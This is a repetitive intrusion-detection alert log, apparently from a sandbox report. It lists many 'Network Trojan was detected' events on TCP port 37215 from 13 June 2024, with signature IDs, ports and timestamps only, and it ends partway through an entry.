              SID:2829579
              Source Port:52380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088948
              SID:2835222
              Source Port:48290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417372
              SID:2835222
              Source Port:59934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.415868
              SID:2835222
              Source Port:34870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677745
              SID:2829579
              Source Port:45800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993578
              SID:2835222
              Source Port:41008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.304098
              SID:2829579
              Source Port:53778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.992283
              SID:2829579
              Source Port:48108
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757993
              SID:2835222
              Source Port:58260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212660
              SID:2835222
              Source Port:39132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.237538
              SID:2829579
              Source Port:50056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.573280
              SID:2835222
              Source Port:45962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300249
              SID:2829579
              Source Port:59902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.832552
              SID:2835222
              Source Port:50886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075848
              SID:2835222
              Source Port:54254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403773
              SID:2835222
              Source Port:38576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349711
              SID:2829579
              Source Port:57150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169807
              SID:2835222
              Source Port:60908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279910
              SID:2829579
              Source Port:44080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.086875
              SID:2835222
              Source Port:38454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276461
              SID:2835222
              Source Port:40344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402348
              SID:2829579
              Source Port:48174
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276140
              SID:2835222
              Source Port:37596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402510
              SID:2829579
              Source Port:56604
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991902
              SID:2835222
              Source Port:37958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.526652
              SID:2829579
              Source Port:60020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.569599
              SID:2835222
              Source Port:46224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.403560
              SID:2835222
              Source Port:46066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.996831
              SID:2829579
              Source Port:55678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.525502
              SID:2835222
              Source Port:50888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456310
              SID:2829579
              Source Port:42166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177398
              SID:2835222
              Source Port:57144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197330
              SID:2829579
              Source Port:60366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458315
              SID:2835222
              Source Port:47638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.972328
              SID:2829579
              Source Port:33894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.191764
              SID:2829579
              Source Port:42008
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.974060
              SID:2835222
              Source Port:43288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889154
              SID:2835222
              Source Port:50462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.972151
              SID:2829579
              Source Port:45368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.254377
              SID:2835222
              Source Port:32984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.086088
              SID:2835222
              Source Port:59230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.997066
              SID:2835222
              Source Port:60326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165626
              SID:2829579
              Source Port:56254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.757002
              SID:2829579
              Source Port:39198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220388
              SID:2829579
              Source Port:41568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221728
              SID:2835222
              Source Port:59866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.607185
              SID:2829579
              Source Port:37218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174438
              SID:2835222
              Source Port:57092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.888232
              SID:2835222
              Source Port:53052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.633505
              SID:2829579
              Source Port:44774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165990
              SID:2829579
              Source Port:51922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.604605
              SID:2835222
              Source Port:45588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.886773
              SID:2835222
              Source Port:48684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726881
              SID:2835222
              Source Port:51732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276684
              SID:2835222
              Source Port:55618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.783269
              SID:2829579
              Source Port:52866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.841622
              SID:2829579
              Source Port:53672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.348501
              SID:2835222
              Source Port:48026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572000
              SID:2835222
              Source Port:59288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487444
              SID:2835222
              Source Port:49812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.355657
              SID:2829579
              Source Port:52004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487561
              SID:2829579
              Source Port:48162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279195
              SID:2829579
              Source Port:51406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913772
              SID:2835222
              Source Port:50778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506697
              SID:2835222
              Source Port:42198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.782752
              SID:2829579
              Source Port:36498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.111933
              SID:2829579
              Source Port:33040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154332
              SID:2829579
              Source Port:40146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.320575
              SID:2829579
              Source Port:54126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212300
              SID:2829579
              Source Port:44530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.246734
              SID:2835222
              Source Port:45118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834492
              SID:2835222
              Source Port:50642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196012
              SID:2835222
              Source Port:36118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889019
              SID:2835222
              Source Port:44848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456745
              SID:2829579
              Source Port:45296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246254
              SID:2835222
              Source Port:35342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.405048
              SID:2835222
              Source Port:36568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544921
              SID:2829579
              Source Port:43454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093478
              SID:2835222
              Source Port:50420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543442
              SID:2835222
              Source Port:47004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.568100
              SID:2835222
              Source Port:60760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728389
              SID:2835222
              Source Port:45692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.174664
              SID:2835222
              Source Port:44212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.569406
              SID:2829579
              Source Port:59172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.403226
              SID:2835222
              Source Port:32990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822267
              SID:2829579
              Source Port:46454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.176589
              SID:2829579
              Source Port:44610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696498
              SID:2829579
              Source Port:52282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211519
              SID:2829579
              Source Port:51840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.108860
              SID:2835222
              Source Port:45426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.372349
              SID:2829579
              Source Port:38386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.724952
              SID:2829579
              Source Port:54426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212494
              SID:2835222
              Source Port:50416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.073932
              SID:2829579
              Source Port:42746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.842095
              SID:2829579
              Source Port:56204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306558
              SID:2829579
              Source Port:42764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407702
              SID:2835222
              Source Port:56510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.820328
              SID:2829579
              Source Port:41334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.672004
              SID:2835222
              Source Port:48690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213098
              SID:2835222
              Source Port:53308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.992823
              SID:2829579
              Source Port:37306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485707
              SID:2835222
              Source Port:36524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302009
              SID:2835222
              Source Port:51814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.678296
              SID:2829579
              Source Port:39122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.243548
              SID:2835222
              Source Port:40420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.932798
              SID:2829579
              Source Port:32910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.523943
              SID:2835222
              Source Port:33494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.631701
              SID:2829579
              Source Port:45738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.477331
              SID:2835222
              Source Port:33312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109748
              SID:2829579
              Source Port:34418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087130
              SID:2829579
              Source Port:42060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755515
              SID:2835222
              Source Port:60614
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.042671
              SID:2835222
              Source Port:54132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.128340
              SID:2829579
              Source Port:52764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.753493
              SID:2829579
              Source Port:55666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212372
              SID:2829579
              Source Port:56296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.242012
              SID:2829579
              Source Port:58962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.635987
              SID:2829579
              Source Port:32974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153921
              SID:2835222
              Source Port:45744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871241
              SID:2835222
              Source Port:50264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.455288
              SID:2835222
              Source Port:36678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.508130
              SID:2835222
              Source Port:35252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.656947
              SID:2829579
              Source Port:49300
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610658
              SID:2835222
              Source Port:41774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229462
              SID:2835222
              Source Port:50566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.130534
              SID:2835222
              Source Port:52940
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.355960
              SID:2829579
              Source Port:52006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458971
              SID:2835222
              Source Port:60702
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.638386
              SID:2829579
              Source Port:35336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087928
              SID:2835222
              Source Port:53610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222661
              SID:2829579
              Source Port:60724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485089
              SID:2835222
              Source Port:42150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758716
              SID:2835222
              Source Port:53724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223429
              SID:2835222
              Source Port:49896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.556226
              SID:2829579
              Source Port:40286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660072
              SID:2829579
              Source Port:60382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220493
              SID:2829579
              Source Port:41382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.457767
              SID:2829579
              Source Port:59356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.784439
              SID:2829579
              Source Port:60540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.987716
              SID:2829579
              Source Port:49024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.634491
              SID:2829579
              Source Port:46328
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408907
              SID:2829579
              Source Port:45050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417658
              SID:2835222
              Source Port:52910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.972384
              SID:2829579
              Source Port:57218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078725
              SID:2835222
              Source Port:47340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.056344
              SID:2835222
              Source Port:34856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153391
              SID:2835222
              Source Port:36436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349409
              SID:2829579
              Source Port:33870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.400845
              SID:2829579
              Source Port:54082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.549659
              SID:2829579
              Source Port:37096
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.378607
              SID:2829579
              Source Port:52480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088773
              SID:2829579
              Source Port:58824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220335
              SID:2835222
              Source Port:35786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.354923
              SID:2829579
              Source Port:60530
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.457360
              SID:2835222
              Source Port:60298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439685
              SID:2829579
              Source Port:50660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439282
              SID:2829579
              Source Port:49408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657016
              SID:2829579
              Source Port:50494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.295101
              SID:2829579
              Source Port:52272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.045655
              SID:2835222
              Source Port:58894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.938121
              SID:2829579
              Source Port:46908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.678038
              SID:2829579
              Source Port:56178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.632030
              SID:2835222
              Source Port:44790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.074446
              SID:2835222
              Source Port:55218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546312
              SID:2835222
              Source Port:39122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169182
              SID:2835222
              Source Port:50520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.155169
              SID:2835222
              Source Port:54094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.671189
              SID:2835222
              Source Port:47378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.177847
              SID:2835222
              Source Port:60254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.567220
              SID:2835222
              Source Port:34298
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.508215
              SID:2835222
              Source Port:48756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.782610
              SID:2829579
              Source Port:40794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027646
              SID:2835222
              Source Port:47382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.372050
              SID:2829579
              Source Port:36160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.243018
              SID:2829579
              Source Port:46906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.166626
              SID:2829579
              Source Port:56134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.954199
              SID:2835222
              Source Port:58958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092645
              SID:2829579
              Source Port:41222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.724509
              SID:2835222
              Source Port:35648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093757
              SID:2835222
              Source Port:52136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357266
              SID:2829579
              Source Port:34440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614671
              SID:2829579
              Source Port:40936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.166086
              SID:2835222
              Source Port:34410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.372674
              SID:2835222
              Source Port:55626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458730
              SID:2835222
              Source Port:48802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438859
              SID:2829579
              Source Port:52044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.422823
              SID:2835222
              Source Port:39814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245950
              SID:2829579
              Source Port:55900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.323992
              SID:2829579
              Source Port:41484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.215337
              SID:2835222
              Source Port:43366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.380261
              SID:2829579
              Source Port:35514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694615
              SID:2835222
              Source Port:60506
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075891
              SID:2835222
              Source Port:51904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.675448
              SID:2829579
              Source Port:57866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165451
              SID:2835222
              Source Port:39586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.508655
              SID:2829579
              Source Port:52314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.709012
              SID:2835222
              Source Port:58752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611164
              SID:2835222
              Source Port:34530
              Destination Port:37215
